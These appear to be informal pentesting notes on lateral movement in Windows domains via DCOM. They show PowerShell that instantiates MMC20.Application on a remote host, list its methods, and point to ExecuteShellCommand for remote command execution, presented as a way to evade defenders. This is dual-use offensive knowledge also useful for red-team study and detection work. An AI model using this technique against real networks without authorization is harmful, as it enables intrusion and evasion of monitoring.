- Set of Microsoft concepts and program interfaces
- client object can request to server
- work withing network using TCP/IP
- replace of OLE
- extend COM which is only runs in local
Protocol Stack
- Higher Level Appplication
- DCOM
- RPC
Protocol Overview
- client make ORPC object by using higher level application
- server use object resolver and object explorer
Why dcom??
- old use of psexec , schtalk , winrm easy to find out by defenders
prerequisite
- need domain admin privilege, if you don’t have it , get it done , this is lateral movement.
MMC20.application
- allow to scripts MMC snap-in operations.
Enumerating methdo of MMC2.application
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC2.Application","192.168.x.x"))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| PS C:\WINDOWS\system32> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.206"))
PS C:\WINDOWS\system32> $com.Document.ActiveView |get-member
TypeName: System.__ComObject#{6efc2da2-b38c-457e-9abb-ed2d189b8c38}
Name MemberType Definition
---- ---------- ----------
Back Method void Back ()
Close Method void Close ()
CopyScopeNode Method void CopyScopeNode (Variant)
CopySelection Method void CopySelection ()
DeleteScopeNode Method void DeleteScopeNode (Variant)
DeleteSelection Method void DeleteSelection ()
Deselect Method void Deselect (Node)
DisplayScopeNodePropertySheet Method void DisplayScopeNodePropertySheet (Variant)
DisplaySelectionPropertySheet Method void DisplaySelectionPropertySheet ()
ExecuteScopeNodeMenuItem Method void ExecuteScopeNodeMenuItem (string, Variant)
ExecuteSelectionMenuItem Method void ExecuteSelectionMenuItem (string)
ExecuteShellCommand Method void ExecuteShellCommand (string, string, string, string)
ExportList Method void ExportList (string, ExportListOptions)
Forward Method void Forward ()
Is Method bool Is (View)
IsSelected Method int IsSelected (Node)
RefreshScopeNode Method void RefreshScopeNode (Variant)
RefreshSelection Method void RefreshSelection ()
RenameScopeNode Method void RenameScopeNode (string, Variant)
RenameSelectedItem Method void RenameSelectedItem (string)
Select Method void Select (Node)
SelectAll Method void SelectAll ()
SnapinScopeObject Method IDispatch SnapinScopeObject (Variant)
SnapinSelectionObject Method IDispatch SnapinSelectionObject ()
ViewMemento Method void ViewMemento (string)
CellContents ParameterizedProperty string CellContents (Node, int) {get}
ScopeNodeContextMenu ParameterizedProperty ContextMenu ScopeNodeContextMenu (Variant) {get}
ActiveScopeNode Property Node ActiveScopeNode () {get} {set}
Columns Property Columns Columns () {get}
ControlObject Property IDispatch ControlObject () {get}
Document Property Document Document () {get}
Frame Property Frame Frame () {get}
ListItems Property Nodes ListItems () {get}
ListViewMode Property ListViewMode ListViewMode () {get} {set}
Memento Property string Memento () {get}
ScopeTreeVisible Property int ScopeTreeVisible () {get} {set}
Selection Property Nodes Selection () {get}
SelectionContextMenu Property ContextMenu SelectionContextMenu () {get}
StatusBarText Property string StatusBarText () {set}
|
method to be called for command injection is ExecuteShellCommand
this method can be execute via network , but need admin access to other computer.
- for example you can execute from client machine with domain admin privilege to domain controller .
Ref
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
https://technet.microsoft.com/en-us/library/cc181199.aspx?f=255&MSPPError=-2147217396
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/